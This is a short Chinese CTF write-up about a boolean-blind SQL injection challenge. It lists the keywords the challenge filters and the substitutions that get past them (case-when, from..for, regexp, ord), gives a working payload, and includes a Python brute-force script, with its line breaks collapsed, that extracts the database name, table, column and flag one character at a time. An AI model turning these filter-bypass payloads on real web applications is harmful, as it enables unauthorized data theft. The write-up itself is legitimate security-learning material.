一看就是sql注入题
尝试了一下发现过滤的东西还挺多的(union,like,=,’,空格,and,if,逗号,ascii,sleep)等
不能用正常的布尔盲注:1^if(ascii(substr('flag',1,1))=104,1,0)
题目过滤了if
看了wp才知道有这种方式:case(A)when(B)then(C)else(D)end
绕过过滤:
过滤了空格可以用()代替
过滤了逗号可以用from..for代替
过滤了and可以用^或or来代替
过滤了ascli可以用 ord代替
过滤了等号和like可以用regexp代替
所以有了payload:id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end
import requests
url = "http://e576e0ce-3634-40b4-a9b9-d97a15b78d37.challenge.ctf.show/index.php?id=1^"
flag = ""
for i in range(1,50): #库名表名字段名以及flag的长度print("i="+str(i))for j in range(38,126): # 可打印字符#payload = "case(ord(substr(database()from({})for(1))))when({})then(2)else(3)end".format(i,j) #爆库#payload = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({})for(1))))when({})then(2)else(3)end".format(i,j) #爆表#payload = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({})for(1))))when({})then(2)else(3)end".format(i,j) # 爆字段payload = "case(ord(substr((select(group_concat(flag))from(flag))from({})for(1))))when({})then(2)else(3)end".format(i,j) #爆flaga = url+payloadr = requests.get(a).text #获取响应包信息if "I asked nothing" in r:flag+=chr(j)print(flag)break
到这里基本解出了,基本上是看大佬的wp
写点自己的想法。
遇上不同的布尔盲注题目需要自己去看回显的东西,回显东西不同脚本也不同。
同时没有一个脚本是通用的,需要自己去修改学习,但大体上是大差不差的。
......
